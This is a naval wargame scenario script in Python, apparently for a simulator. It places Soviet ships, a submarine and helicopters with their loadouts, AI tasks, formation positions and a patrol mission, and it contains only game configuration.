BB.Write('129_EngageLimit', '1')
BB.Write('16_EngageLimit', '4')
BB.Write('17_EngageLimit', '6')
BB.Write('18_EngageLimit', '12')
BB.Write('22_EngageLimit', '24')
BB.Write('256_EngageLimit', '2')
BB.Write('257_EngageLimit', '24')
BB.Write('258_EngageLimit', '2')
BB.Write('32_EngageLimit', '1')
BB.Write('33_EngageLimit', '1')
BB.Write('34_EngageLimit', '1')
BB.Write('64_EngageLimit', '1')
BB.Write('ID_EngageLimit', '{"12": "0"}')
BB.Write('MissionTarget', '["Target", 12]')
BB.Write('Selected', '{"RotaryWing": 0, "Speed-": 10, "Alt+": 0, "Speed+": 10, "RadarMast+": 0, "RadarMast-": 1, "34_EngageLimit": "1", "257_EngageLimit": "24", "17_EngageLimit": "6", "UnitCount": 7, "HasECM": 0, "HasTarget": 0, "TargetDatum": 0, "Alliance0_EngageLimit": -1, "FixedLand": 0, "Launchers": 1, "Periscope-": 1, "FixedWing": 0, "MagWeaponList": {"9M32M Strela 3": 8, "30mm OF-84 HE-FRAG AK-630M": 12272, "TEST-68": 0, "TEST-71ME": 0, "RPK-6 Vodopod": 0, "SAET-60M": 0, "130mm F-44 HE": 500, "SET-65M": 144, "100mm OF-58 FRAG": 1400, "9M330 Kinzhal": 0, "TEST-71MKE": 0, "3M45 Granit": 0, "30mm OP-84 FRAG Tracer AK-630M": 0, "Yu-6": 0, "130mm ZS-44 AA": 0, "9M32 Strela 2": 48, "RPK-3 Metel": 0, "SET-65": 0, "TEST-71": 0, "53-56V": 0, "5V55RM": 0, "3M10 Granat(n)": 0, "3M10 Granat": 0, "AT-2M": 0, "76.2mm OS-62 FRAG": 0, "9M33M": 0, "53-56": 0, "100mm ZS-58 AA": 0, "130mm ZS-44P AA": 0, "3M54E Klub Alfa": 0, "76.2mm ZS-63 AA": 0, "100mm ZS-58P AA": 0, "53-65KE": 0, "3M80M Moskit-M": 0, "USET-80": 0, "Shkval": 0, "53-65M": 196}, "Air": 0, "64_EngageLimit": "1", "HasAIWeap": 0, "18_EngageLimit": "12", "256_EngageLimit": "2", "Depth+": 250.0, "MobileLand": 0, "CanStrafe": 0, "Depth-": 0, "HasSonarP": 1, "HasThrottle": 0, "PeriDeep": 0, "Sub": 2, "HasSonarA": 1, "HasFlightPort": 1, "HasMagazine": 1, "DieselSub": 1, "HasGBU": 0, "HasAINav": 0, "FormMember": 4, "Alliance1_EngageLimit": -1, "HasBombs": 0, "Snorkel-": 1, "TargetTrack": 1, "Snorkel+": 0, "16_EngageLimit": "4", "Alliance2_EngageLimit": -1, "258_EngageLimit": "2", "FormLeader": 1, "129_EngageLimit": "1", "HasESM": 1, "Periscope+": 0, "22_EngageLimit": "24", "FormModeSprint": 4, "32_EngageLimit": "1", "Tasks": {"MissileWarning": 2, "Nav": 3, "EngageAll": 5}, "HasOptical": 1, "33_EngageLimit": "1", "HasRadar": 1, "Ship": 5, "TargetSet": 1, "FormModePace": 0, "WeaponList": {"9M330 Kinzhal": [64, 64], "9M32M Strela 3": [1, 1], "5V55RM": [64, 64], "3M45 Granit": [16, 16], "9M32 Strela 2": [24, 24], "SET-65M": [8, 8], "130mm F-44 HE": [100, 100], "30mm OF-84 HE-FRAG AK-630M": [590, 590], "76.2mm OS-62 FRAG": [608, 608], "9M33M": [80, 80], "100mm OF-58 FRAG": [92, 92], "53-65M": [26, 26], "RPK-3 Metel": [12, 12]}}')
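# Note (editor's addition): the BB.Write calls above seed this unit's AI blackboard.
# The *_EngageLimit keys appear to cap how many weapons may be committed per target
# category, 'MissionTarget' tags the unit's tasking, and 'Selected' stores a large
# JSON snapshot of UI/AI state; the same block repeats for the other Soviet units below.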
unit = SM.GetDefaultUnit()
unit.className = 'Pr 877M Paltus'
unit.unitName = "B-439"
unit.SetPosition(14.446730, 68.047276, -150.0)
unit.heading = 74.08
unit.speed = 5.9
unit.cost = 0.0
SM.AddUnitToAlliance(unit, 2)
SM.SetUnitLauncherItem(unit.unitName, 0, '9M32M Strela 3', 1)
SM.SetUnitLauncherItem(unit.unitName, 1, 'SET-65M', 1)
SM.SetUnitLauncherItem(unit.unitName, 2, 'SET-65M', 1)
SM.SetUnitLauncherItem(unit.unitName, 3, 'SET-65M', 1)
SM.SetUnitLauncherItem(unit.unitName, 4, 'SET-65M', 1)
SM.SetUnitLauncherItem(unit.unitName, 5, '53-65M', 1)
SM.SetUnitLauncherItem(unit.unitName, 6, '53-65M', 1)
UI = SM.GetUnitInterface(unit.unitName)
SM.AddToUnitMagazine("B-439", 'SET-65M', 12)
SM.AddToUnitMagazine("B-439", '53-65M', 6)
SM.AddToUnitMagazine("B-439", '9M32M Strela 3', 8)
UI.SetSensorState(0, 0)
UI.SetSensorState(4, 0)
UI.AddTask('AvoidCav', 3.000000, 3)
UI.AddTask('EngageAll', 2.000000, 0)
UI.AddTask('Nav', 1.000000, 0)
UI.AddNavWaypointAdvanced(0.257382, 1.188411, 0.000000, 0.000000)
UI.AddNavWaypointAdvanced(0.265398, 1.190210, 0.000000, 0.000000)
UI.AddNavWaypointAdvanced(0.271771, 1.191623, 0.000000, 0.000000)
UI.AddNavWaypointAdvanced(0.278605, 1.193216, 0.000000, 0.000000)
UI.SetNavLoopState(1)
UI.AddTask('SubBattery', 4.000000, 3)
UI.AddTask('SubEvade', 3.000000, 3)
BB = UI.GetBlackboardInterface()
BB.Write('129_EngageLimit', '1')
BB.Write('16_EngageLimit', '4')
BB.Write('17_EngageLimit', '6')
BB.Write('18_EngageLimit', '12')
BB.Write('22_EngageLimit', '24')
BB.Write('256_EngageLimit', '2')
BB.Write('257_EngageLimit', '24')
BB.Write('258_EngageLimit', '2')
BB.Write('32_EngageLimit', '1')
BB.Write('33_EngageLimit', '1')
BB.Write('34_EngageLimit', '1')
BB.Write('64_EngageLimit', '1')
BB.Write('ID_EngageLimit', '{"12": "0"}')
BB.Write('MissionTarget', '["Target", 12]')
BB.Write('Selected', '{"RotaryWing": 0, "Speed-": 10, "Alt+": 0, "Speed+": 10, "RadarMast+": 0, "RadarMast-": 1, "34_EngageLimit": "1", "257_EngageLimit": "24", "17_EngageLimit": "6", "UnitCount": 7, "HasECM": 0, "HasTarget": 0, "TargetDatum": 0, "Alliance0_EngageLimit": -1, "FixedLand": 0, "Launchers": 1, "Periscope-": 1, "FixedWing": 0, "MagWeaponList": {"9M32M Strela 3": 8, "30mm OF-84 HE-FRAG AK-630M": 12272, "TEST-68": 0, "TEST-71ME": 0, "RPK-6 Vodopod": 0, "SAET-60M": 0, "130mm F-44 HE": 500, "SET-65M": 144, "100mm OF-58 FRAG": 1400, "9M330 Kinzhal": 0, "TEST-71MKE": 0, "3M45 Granit": 0, "30mm OP-84 FRAG Tracer AK-630M": 0, "Yu-6": 0, "130mm ZS-44 AA": 0, "9M32 Strela 2": 48, "RPK-3 Metel": 0, "SET-65": 0, "TEST-71": 0, "53-56V": 0, "5V55RM": 0, "3M10 Granat(n)": 0, "3M10 Granat": 0, "AT-2M": 0, "76.2mm OS-62 FRAG": 0, "9M33M": 0, "53-56": 0, "100mm ZS-58 AA": 0, "130mm ZS-44P AA": 0, "3M54E Klub Alfa": 0, "76.2mm ZS-63 AA": 0, "100mm ZS-58P AA": 0, "53-65KE": 0, "3M80M Moskit-M": 0, "USET-80": 0, "Shkval": 0, "53-65M": 196}, "Air": 0, "64_EngageLimit": "1", "HasAIWeap": 0, "18_EngageLimit": "12", "256_EngageLimit": "2", "Depth+": 250.0, "MobileLand": 0, "CanStrafe": 0, "Depth-": 0, "HasSonarP": 1, "HasThrottle": 0, "PeriDeep": 0, "Sub": 2, "HasSonarA": 1, "HasFlightPort": 1, "HasMagazine": 1, "DieselSub": 1, "HasGBU": 0, "HasAINav": 0, "FormMember": 4, "Alliance1_EngageLimit": -1, "HasBombs": 0, "Snorkel-": 1, "TargetTrack": 1, "Snorkel+": 0, "16_EngageLimit": "4", "Alliance2_EngageLimit": -1, "258_EngageLimit": "2", "FormLeader": 1, "129_EngageLimit": "1", "HasESM": 1, "Periscope+": 0, "22_EngageLimit": "24", "FormModeSprint": 4, "32_EngageLimit": "1", "Tasks": {"MissileWarning": 2, "Nav": 3, "EngageAll": 5}, "HasOptical": 1, "33_EngageLimit": "1", "HasRadar": 1, "Ship": 5, "TargetSet": 1, "FormModePace": 0, "WeaponList": {"9M330 Kinzhal": [64, 64], "9M32M Strela 3": [1, 1], "5V55RM": [64, 64], "3M45 Granit": [16, 16], "9M32 Strela 2": [24, 24], "SET-65M": [8, 8], "130mm F-44 HE": [100, 100], "30mm OF-84 HE-FRAG AK-630M": [590, 590], "76.2mm OS-62 FRAG": [608, 608], "9M33M": [80, 80], "100mm OF-58 FRAG": [92, 92], "53-65M": [26, 26], "RPK-3 Metel": [12, 12]}}')
unit = SM.GetDefaultUnit()
unit.className = 'Pr 1135 Burevestnik'
unit.unitName = "Letuchiy"
unit.SetPosition(14.233189, 67.882095, 0.0)
unit.heading = 46.18
unit.speed = 10.0
unit.cost = 0.0
SM.AddUnitToAlliance(unit, 2)
SM.SetUnitLauncherItem(unit.unitName, 0, '53-65M', 2)
SM.SetUnitLauncherItem(unit.unitName, 1, '53-65M', 2)
SM.SetUnitLauncherItem(unit.unitName, 2, '76.2mm OS-62 FRAG', 152)
SM.SetUnitLauncherItem(unit.unitName, 3, '76.2mm OS-62 FRAG', 152)
SM.SetUnitLauncherItem(unit.unitName, 4, '9M33M', 20)
SM.SetUnitLauncherItem(unit.unitName, 5, '9M33M', 20)
SM.SetUnitLauncherItem(unit.unitName, 6, 'RPK-3 Metel', 4)
UI = SM.GetUnitInterface(unit.unitName)
SM.AddToUnitMagazine("Letuchiy", '53-65M', 8)
UI.AddTask('EngageAll', 2.000000, 0)
UI.AddTask('MissileWarning', 0.000000, 0)
UI.AddTask('Nav', 1.000000, 0)
UI.AddNavWaypointAdvanced(0.254028, 1.187456, 0.000000, 0.000000)
UI.AddNavWaypointAdvanced(0.262348, 1.189906, 0.000000, 0.000000)
UI.AddNavWaypointAdvanced(0.270299, 1.191123, 0.000000, 0.000000)
UI.AddNavWaypointAdvanced(0.274493, 1.191760, 0.000000, 0.000000)
UI.AddNavWaypointAdvanced(0.279261, 1.193445, 0.000000, 0.000000)
UI.AddTask('PointDefense', 3.000000, 3)
BB = UI.GetBlackboardInterface()
BB.Write('129_EngageLimit', '1')
BB.Write('16_EngageLimit', '4')
BB.Write('17_EngageLimit', '6')
BB.Write('18_EngageLimit', '12')
BB.Write('22_EngageLimit', '24')
BB.Write('256_EngageLimit', '2')
BB.Write('257_EngageLimit', '24')
BB.Write('258_EngageLimit', '2')
BB.Write('32_EngageLimit', '1')
BB.Write('33_EngageLimit', '1')
BB.Write('34_EngageLimit', '1')
BB.Write('64_EngageLimit', '1')
BB.Write('ID_EngageLimit', '{"12": "0"}')
BB.Write('MissionTarget', '["Target", 12]')
BB.Write('Selected', '{"RotaryWing": 0, "Speed-": 10, "Alt+": 0, "Speed+": 10, "RadarMast+": 0, "RadarMast-": 0, "34_EngageLimit": "1", "257_EngageLimit": "24", "17_EngageLimit": "6", "UnitCount": 4, "HasECM": 0, "HasTarget": 0, "TargetDatum": 0, "Alliance0_EngageLimit": -1, "FixedLand": 0, "Launchers": 1, "Periscope-": 0, "FixedWing": 0, "MagWeaponList": {"30mm OF-84 HE-FRAG AK-630M": 8496, "TEST-68": 0, "RPK-6 Vodopod": 0, "SAET-60M": 0, "130mm F-44 HE": 500, "SET-65M": 0, "3M45 Granit": 0, "30mm OP-84 FRAG Tracer AK-630M": 0, "Yu-6": 0, "130mm ZS-44 AA": 0, "RPK-3 Metel": 0, "SET-65": 0, "TEST-71": 0, "53-56V": 0, "5V55RM": 0, "AT-2M": 0, "76.2mm OS-62 FRAG": 0, "9M33M": 0, "53-56": 0, "130mm ZS-44P AA": 0, "76.2mm ZS-63 AA": 0, "9M32 Strela 2": 48, "USET-80": 0, "Shkval": 0, "53-65M": 76}, "Air": 0, "64_EngageLimit": "1", "HasAIWeap": 0, "18_EngageLimit": "12", "256_EngageLimit": "2", "Depth+": 0, "MobileLand": 0, "CanStrafe": 0, "Depth-": 0, "HasSonarP": 1, "HasThrottle": 0, "PeriDeep": 0, "Sub": 0, "HasSonarA": 1, "HasFlightPort": 1, "HasMagazine": 1, "DieselSub": 0, "HasGBU": 0, "HasAINav": 0, "FormMember": 3, "Alliance1_EngageLimit": -1, "HasBombs": 0, "Snorkel-": 0, "TargetTrack": 1, "Snorkel+": 0, "16_EngageLimit": "4", "Alliance2_EngageLimit": -1, "258_EngageLimit": "2", "FormLeader": 1, "129_EngageLimit": "1", "HasESM": 1, "Periscope+": 0, "22_EngageLimit": "24", "FormModeSprint": 0, "32_EngageLimit": "1", "Tasks": {"MissileWarning": 2, "Nav": 1, "EngageAll": 2}, "HasOptical": 1, "33_EngageLimit": "1", "HasRadar": 1, "Ship": 4, "TargetSet": 0, "FormModePace": 3, "WeaponList": {"130mm F-44 HE": [100, 100], "5V55RM": [64, 64], "3M45 Granit": [16, 16], "9M32 Strela 2": [24, 24], "30mm OF-84 HE-FRAG AK-630M": [354, 354], "76.2mm OS-62 FRAG": [608, 608], "9M33M": [80, 80], "53-65M": [14, 14], "RPK-3 Metel": [4, 4]}}')
unit = SM.GetDefaultUnit()
unit.className = 'Pr 1171 Tapir'
unit.unitName = "Nikolay Vilkov"
UI = SM.GetUnitInterface('Letuchiy')
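# The leader track reports position in radians; 57.296 is approximately
# 180/pi, so the next two lines convert to degrees. The fixed offsets are
# scenario data placing this unit relative to the leader 'Letuchiy'.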
leader_track = UI.GetTrackById(UI.GetPlatformId())
lon_deg = 57.296*leader_track.Lon + -0.0607
lat_deg = 57.296*leader_track.Lat + -0.0012
unit.SetPosition(lon_deg, lat_deg, 0.0)
unit.heading = 45.72
unit.speed = 10.0
unit.cost = 0.0
SM.AddUnitToAlliance(unit, 2)
SM.SetUnitLauncherItem(unit.unitName, 0, '76.2mm OS-62 FRAG', 152)
SM.SetUnitLauncherItem(unit.unitName, 1, '9M32 Strela 2', 12)
UI = SM.GetUnitInterface(unit.unitName)
SM.AddToUnitMagazine("Nikolay Vilkov", '9M32 Strela 2', 24)
UI.AddTask('MissileWarning', 3.000000, 3)
UI.AddTask('PointDefense', 3.000000, 3)
BB = UI.GetBlackboardInterface()
BB.Write('129_EngageLimit', '1')
BB.Write('16_EngageLimit', '4')
BB.Write('17_EngageLimit', '6')
BB.Write('18_EngageLimit', '12')
BB.Write('22_EngageLimit', '24')
BB.Write('256_EngageLimit', '2')
BB.Write('257_EngageLimit', '24')
BB.Write('258_EngageLimit', '2')
BB.Write('32_EngageLimit', '1')
BB.Write('33_EngageLimit', '1')
BB.Write('34_EngageLimit', '1')
BB.Write('64_EngageLimit', '1')
BB.Write('ID_EngageLimit', '{"12": "0"}')
BB.Write('MissionTarget', '["Target", 12]')
BB.Write('Selected', '{"RotaryWing": 0, "Speed-": 10, "Alt+": 0, "Speed+": 10, "RadarMast+": 0, "RadarMast-": 0, "34_EngageLimit": "1", "257_EngageLimit": "24", "17_EngageLimit": "6", "UnitCount": 4, "HasECM": 0, "HasTarget": 0, "TargetDatum": 0, "Alliance0_EngageLimit": -1, "FixedLand": 0, "Launchers": 1, "Periscope-": 0, "FixedWing": 0, "MagWeaponList": {"30mm OF-84 HE-FRAG AK-630M": 8496, "TEST-68": 0, "RPK-6 Vodopod": 0, "SAET-60M": 0, "130mm F-44 HE": 500, "SET-65M": 0, "3M45 Granit": 0, "30mm OP-84 FRAG Tracer AK-630M": 0, "Yu-6": 0, "130mm ZS-44 AA": 0, "RPK-3 Metel": 0, "SET-65": 0, "TEST-71": 0, "53-56V": 0, "5V55RM": 0, "AT-2M": 0, "76.2mm OS-62 FRAG": 0, "9M33M": 0, "53-56": 0, "130mm ZS-44P AA": 0, "76.2mm ZS-63 AA": 0, "9M32 Strela 2": 48, "USET-80": 0, "Shkval": 0, "53-65M": 76}, "Air": 0, "64_EngageLimit": "1", "HasAIWeap": 0, "18_EngageLimit": "12", "256_EngageLimit": "2", "Depth+": 0, "MobileLand": 0, "CanStrafe": 0, "Depth-": 0, "HasSonarP": 1, "HasThrottle": 0, "PeriDeep": 0, "Sub": 0, "HasSonarA": 1, "HasFlightPort": 1, "HasMagazine": 1, "DieselSub": 0, "HasGBU": 0, "HasAINav": 0, "FormMember": 3, "Alliance1_EngageLimit": -1, "HasBombs": 0, "Snorkel-": 0, "TargetTrack": 1, "Snorkel+": 0, "16_EngageLimit": "4", "Alliance2_EngageLimit": -1, "258_EngageLimit": "2", "FormLeader": 1, "129_EngageLimit": "1", "HasESM": 1, "Periscope+": 0, "22_EngageLimit": "24", "FormModeSprint": 0, "32_EngageLimit": "1", "Tasks": {"MissileWarning": 2, "Nav": 1, "EngageAll": 2}, "HasOptical": 1, "33_EngageLimit": "1", "HasRadar": 1, "Ship": 4, "TargetSet": 0, "FormModePace": 3, "WeaponList": {"130mm F-44 HE": [100, 100], "5V55RM": [64, 64], "3M45 Granit": [16, 16], "9M32 Strela 2": [24, 24], "30mm OF-84 HE-FRAG AK-630M": [354, 354], "76.2mm OS-62 FRAG": [608, 608], "9M33M": [80, 80], "53-65M": [14, 14], "RPK-3 Metel": [4, 4]}}')
leader_id = UI.LookupFriendlyId('Letuchiy')
UI.SetFormationLeader(leader_id)
UI.SetFormationMode(1)
UI.SetFormationPosition(2.551, 0.358, -2.459, 0.339)
UI.SetFormationAltitudeOffset(0.0)
UI.SetFormationUseNorthBearing(0)
unit = SM.GetDefaultUnit()
unit.className = 'Pr 1171 Tapir'
unit.unitName = "BDK-13"
UI = SM.GetUnitInterface('Letuchiy')
leader_track = UI.GetTrackById(UI.GetPlatformId())
lon_deg = 57.296*leader_track.Lon + -0.0213
lat_deg = 57.296*leader_track.Lat + -0.0268
unit.SetPosition(lon_deg, lat_deg, 0.0)
unit.heading = 45.66
unit.speed = 10.0
unit.cost = 0.0
SM.AddUnitToAlliance(unit, 2)
SM.SetUnitLauncherItem(unit.unitName, 0, '76.2mm OS-62 FRAG', 152)
SM.SetUnitLauncherItem(unit.unitName, 1, '9M32 Strela 2', 12)
UI = SM.GetUnitInterface(unit.unitName)
SM.AddToUnitMagazine("BDK-13", '9M32 Strela 2', 24)
UI.AddTask('MissileWarning', 3.000000, 3)
UI.AddTask('PointDefense', 3.000000, 3)
BB = UI.GetBlackboardInterface()
BB.Write('129_EngageLimit', '1')
BB.Write('16_EngageLimit', '4')
BB.Write('17_EngageLimit', '6')
BB.Write('18_EngageLimit', '12')
BB.Write('22_EngageLimit', '24')
BB.Write('256_EngageLimit', '2')
BB.Write('257_EngageLimit', '24')
BB.Write('258_EngageLimit', '2')
BB.Write('32_EngageLimit', '1')
BB.Write('33_EngageLimit', '1')
BB.Write('34_EngageLimit', '1')
BB.Write('64_EngageLimit', '1')
BB.Write('ID_EngageLimit', '{"12": "0"}')
BB.Write('MissionTarget', '["Target", 12]')
BB.Write('Selected', '{"RotaryWing": 0, "Speed-": 10, "Alt+": 0, "Speed+": 10, "RadarMast+": 0, "RadarMast-": 0, "34_EngageLimit": "1", "257_EngageLimit": "24", "17_EngageLimit": "6", "UnitCount": 4, "HasECM": 0, "HasTarget": 0, "TargetDatum": 0, "Alliance0_EngageLimit": -1, "FixedLand": 0, "Launchers": 1, "Periscope-": 0, "FixedWing": 0, "MagWeaponList": {"30mm OF-84 HE-FRAG AK-630M": 8496, "TEST-68": 0, "RPK-6 Vodopod": 0, "SAET-60M": 0, "130mm F-44 HE": 500, "SET-65M": 0, "3M45 Granit": 0, "30mm OP-84 FRAG Tracer AK-630M": 0, "Yu-6": 0, "130mm ZS-44 AA": 0, "RPK-3 Metel": 0, "SET-65": 0, "TEST-71": 0, "53-56V": 0, "5V55RM": 0, "AT-2M": 0, "76.2mm OS-62 FRAG": 0, "9M33M": 0, "53-56": 0, "130mm ZS-44P AA": 0, "76.2mm ZS-63 AA": 0, "9M32 Strela 2": 48, "USET-80": 0, "Shkval": 0, "53-65M": 76}, "Air": 0, "64_EngageLimit": "1", "HasAIWeap": 0, "18_EngageLimit": "12", "256_EngageLimit": "2", "Depth+": 0, "MobileLand": 0, "CanStrafe": 0, "Depth-": 0, "HasSonarP": 1, "HasThrottle": 0, "PeriDeep": 0, "Sub": 0, "HasSonarA": 1, "HasFlightPort": 1, "HasMagazine": 1, "DieselSub": 0, "HasGBU": 0, "HasAINav": 0, "FormMember": 3, "Alliance1_EngageLimit": -1, "HasBombs": 0, "Snorkel-": 0, "TargetTrack": 1, "Snorkel+": 0, "16_EngageLimit": "4", "Alliance2_EngageLimit": -1, "258_EngageLimit": "2", "FormLeader": 1, "129_EngageLimit": "1", "HasESM": 1, "Periscope+": 0, "22_EngageLimit": "24", "FormModeSprint": 0, "32_EngageLimit": "1", "Tasks": {"MissileWarning": 2, "Nav": 1, "EngageAll": 2}, "HasOptical": 1, "33_EngageLimit": "1", "HasRadar": 1, "Ship": 4, "TargetSet": 0, "FormModePace": 3, "WeaponList": {"130mm F-44 HE": [100, 100], "5V55RM": [64, 64], "3M45 Granit": [16, 16], "9M32 Strela 2": [24, 24], "30mm OF-84 HE-FRAG AK-630M": [354, 354], "76.2mm OS-62 FRAG": [608, 608], "9M33M": [80, 80], "53-65M": [14, 14], "RPK-3 Metel": [4, 4]}}')
leader_id = UI.LookupFriendlyId('Letuchiy')
UI.SetFormationLeader(leader_id)
UI.SetFormationMode(1)
UI.SetFormationPosition(3.175, 0.500, 2.624, 0.200)
UI.SetFormationAltitudeOffset(0.0)
UI.SetFormationUseNorthBearing(0)
unit = SM.GetDefaultUnit()
unit.className = 'Pr 1155 Fregat'
unit.unitName = "Udaloy"
UI = SM.GetUnitInterface('Letuchiy')
leader_track = UI.GetTrackById(UI.GetPlatformId())
lon_deg = 57.296*leader_track.Lon + -0.0780
lat_deg = 57.296*leader_track.Lat + -0.0315
unit.SetPosition(lon_deg, lat_deg, 0.0)
unit.heading = 46.24
unit.speed = 10.0
unit.cost = 0.0
SM.AddUnitToAlliance(unit, 2)
SM.SetUnitLauncherItem(unit.unitName, 0, '9M330 Kinzhal', 64)
SM.SetUnitLauncherItem(unit.unitName, 1, '100mm OF-58 FRAG', 46)
SM.SetUnitLauncherItem(unit.unitName, 2, '100mm OF-58 FRAG', 46)
SM.SetUnitLauncherItem(unit.unitName, 3, '30mm OF-84 HE-FRAG AK-630M', 59)
SM.SetUnitLauncherItem(unit.unitName, 4, '30mm OF-84 HE-FRAG AK-630M', 59)
SM.SetUnitLauncherItem(unit.unitName, 5, '30mm OF-84 HE-FRAG AK-630M', 59)
SM.SetUnitLauncherItem(unit.unitName, 6, '30mm OF-84 HE-FRAG AK-630M', 59)
SM.SetUnitLauncherItem(unit.unitName, 7, 'RPK-3 Metel', 8)
SM.SetUnitLauncherItem(unit.unitName, 8, '53-65M', 4)
SM.SetUnitLauncherItem(unit.unitName, 9, '53-65M', 4)
UI = SM.GetUnitInterface(unit.unitName)
SM.AddToUnitMagazine("Udaloy", 'Fuel', 45900)
SM.AddToUnitMagazine("Udaloy", 'AT-1', 22)
SM.AddToUnitMagazine("Udaloy", 'DICASS (80) Sonobuoy', 135)
SM.AddToUnitMagazine("Udaloy", 'LOFAR (80) Sonobuoy', 135)
SM.AddToUnitMagazine("Udaloy", 'DIFAR (80) Sonobuoy', 378)
SM.AddToUnitMagazine("Udaloy", '30mm OF-84 HE-FRAG AK-630M', 944)
SM.AddToUnitMagazine("Udaloy", '100mm OF-58 FRAG', 700)
SM.AddToUnitMagazine("Udaloy", '53-65M', 24)
UI.AddTask('EngageAll', 2.000000, 0)
UI.AddTask('MissileWarning', 3.000000, 3)
UI.AddTask('PointDefense', 3.000000, 3)
UI.AddTask('RefuelAllAircraft', 3.000000, 3)
BB = UI.GetBlackboardInterface()
BB.Write('129_EngageLimit', '1')
BB.Write('16_EngageLimit', '4')
BB.Write('17_EngageLimit', '6')
BB.Write('18_EngageLimit', '12')
BB.Write('22_EngageLimit', '24')
BB.Write('256_EngageLimit', '2')
BB.Write('257_EngageLimit', '24')
BB.Write('258_EngageLimit', '2')
BB.Write('32_EngageLimit', '1')
BB.Write('33_EngageLimit', '1')
BB.Write('34_EngageLimit', '1')
BB.Write('64_EngageLimit', '1')
BB.Write('ID_EngageLimit', '{"12": "0"}')
BB.Write('MissionTarget', '["Target", 12]')
BB.Write('Selected', '{"RotaryWing": 0, "Speed-": 10, "Alt+": 0, "Speed+": 10, "RadarMast+": 0, "RadarMast-": 1, "34_EngageLimit": "1", "257_EngageLimit": "24", "17_EngageLimit": "6", "UnitCount": 7, "HasECM": 0, "HasTarget": 0, "TargetDatum": 0, "Alliance0_EngageLimit": -1, "FixedLand": 0, "Launchers": 1, "Periscope-": 1, "FixedWing": 0, "MagWeaponList": {"9M32M Strela 3": 8, "30mm OF-84 HE-FRAG AK-630M": 12272, "TEST-68": 0, "TEST-71ME": 0, "RPK-6 Vodopod": 0, "SAET-60M": 0, "130mm F-44 HE": 500, "SET-65M": 144, "100mm OF-58 FRAG": 1400, "9M330 Kinzhal": 0, "TEST-71MKE": 0, "3M45 Granit": 0, "30mm OP-84 FRAG Tracer AK-630M": 0, "Yu-6": 0, "130mm ZS-44 AA": 0, "9M32 Strela 2": 48, "RPK-3 Metel": 0, "SET-65": 0, "TEST-71": 0, "53-56V": 0, "5V55RM": 0, "3M10 Granat(n)": 0, "3M10 Granat": 0, "AT-2M": 0, "76.2mm OS-62 FRAG": 0, "9M33M": 0, "53-56": 0, "100mm ZS-58 AA": 0, "130mm ZS-44P AA": 0, "3M54E Klub Alfa": 0, "76.2mm ZS-63 AA": 0, "100mm ZS-58P AA": 0, "53-65KE": 0, "3M80M Moskit-M": 0, "USET-80": 0, "Shkval": 0, "53-65M": 196}, "Air": 0, "64_EngageLimit": "1", "HasAIWeap": 0, "18_EngageLimit": "12", "256_EngageLimit": "2", "Depth+": 250.0, "MobileLand": 0, "CanStrafe": 0, "Depth-": 0, "HasSonarP": 1, "HasThrottle": 0, "PeriDeep": 0, "Sub": 2, "HasSonarA": 1, "HasFlightPort": 1, "HasMagazine": 1, "DieselSub": 1, "HasGBU": 0, "HasAINav": 0, "FormMember": 4, "Alliance1_EngageLimit": -1, "HasBombs": 0, "Snorkel-": 1, "TargetTrack": 1, "Snorkel+": 0, "16_EngageLimit": "4", "Alliance2_EngageLimit": -1, "258_EngageLimit": "2", "FormLeader": 1, "129_EngageLimit": "1", "HasESM": 1, "Periscope+": 0, "22_EngageLimit": "24", "FormModeSprint": 4, "32_EngageLimit": "1", "Tasks": {"MissileWarning": 2, "Nav": 3, "EngageAll": 5}, "HasOptical": 1, "33_EngageLimit": "1", "HasRadar": 1, "Ship": 5, "TargetSet": 1, "FormModePace": 0, "WeaponList": {"9M330 Kinzhal": [64, 64], "9M32M Strela 3": [1, 1], "5V55RM": [64, 64], "3M45 Granit": [16, 16], "9M32 Strela 2": [24, 24], "SET-65M": [8, 8], "130mm F-44 HE": [100, 100], "30mm OF-84 HE-FRAG AK-630M": [590, 590], "76.2mm OS-62 FRAG": [608, 608], "9M33M": [80, 80], "100mm OF-58 FRAG": [92, 92], "53-65M": [26, 26], "RPK-3 Metel": [12, 12]}}')
leader_id = UI.LookupFriendlyId('Letuchiy')
UI.SetFormationLeader(leader_id)
UI.SetFormationMode(2)
UI.SetFormationPosition(4.837, 0.500, 3.079, 0.200)
UI.SetFormationAltitudeOffset(0.0)
UI.SetFormationUseNorthBearing(0)
SM.AddUnitToFlightDeck('Udaloy', 'Ka-27A', 'Fregat Ka-27 1', 1)
SM.SetFlightDeckUnitLoadout('Udaloy', 'Fregat Ka-27 1', '5 DICASS (80) Sonobuoy;5 LOFAR (80) Sonobuoy;14 DIFAR (80) Sonobuoy;2 AT-1;')
SM.AddUnitToFlightDeck('Udaloy', 'Ka-27A', 'Udaloy ASW-1', 2)
SM.SetFlightDeckUnitLoadout('Udaloy', 'Udaloy ASW-1', '5 DICASS (80) Sonobuoy;5 LOFAR (80) Sonobuoy;14 DIFAR (80) Sonobuoy;2 AT-1;')
FP = UI.GetFlightPortInfo()
base_track = UI.GetTrackById(UI.GetPlatformId())
mission_id = FP.AddGenericMission()
FP.AddAircraftToMission(mission_id, 'Udaloy ASW-1')
FP.AddAircraftToMission(mission_id, 'Fregat Ka-27 1')
FP.SetMissionLaunchTime(mission_id, '13:00:00+0m')
FP.SetMissionDatum(mission_id, 0.0000000, 0.0000000)
FP.SetMissionLandingTarget(mission_id, '')
FP.SetMissionWaveQuantity(mission_id, 1)
FP.SetMissionType(mission_id, '')
FP.SetMissionPatrolArea(mission_id, '-0.0029559,0.0023593,-0.0016718,0.0023831,-0.0014776,0.0011437,-0.0026294,0.0012958,')
FP.SetMissionPatrolAnchor(mission_id, 'Udaloy', 2)
FP.AddMissionWaypointAdvanced(mission_id, 0.2480410, 1.1851740, 2000.0, 200.0)
FP.SetMissionWaypointTasks(mission_id, 0, 'WaitForGroup,EngageAll')
FP.AddMissionWaypointAdvanced(mission_id, 0.2497580, 1.1855460, 3000.0, 300.0)
FP.SetMissionWaypointTasks(mission_id, 1, 'AirPatrolArea,EngageAll')
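# Judging by the task names (semantics are defined by the simulator, not this
# script): waypoint 0 holds the helicopters until the flight has formed up
# (WaitForGroup), waypoint 1 starts the area patrol (AirPatrolArea), and
# EngageAll stays active on both legs.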
unit = SM.GetDefaultUnit()
unit.className = 'Pr 1164 Atlant'
unit.unitName = "Moskva"
UI = SM.GetUnitInterface('Letuchiy')
leader_track = UI.GetTrackById(UI.GetPlatformId())
lon_deg = 57.296*leader_track.Lon + -0.0369
lat_deg = 57.296*leader_track.Lat + -0.0145
unit.SetPosition(lon_deg, lat_deg, 0.0)
unit.heading = 46.12
unit.speed = 10.0
unit.cost = 0.0
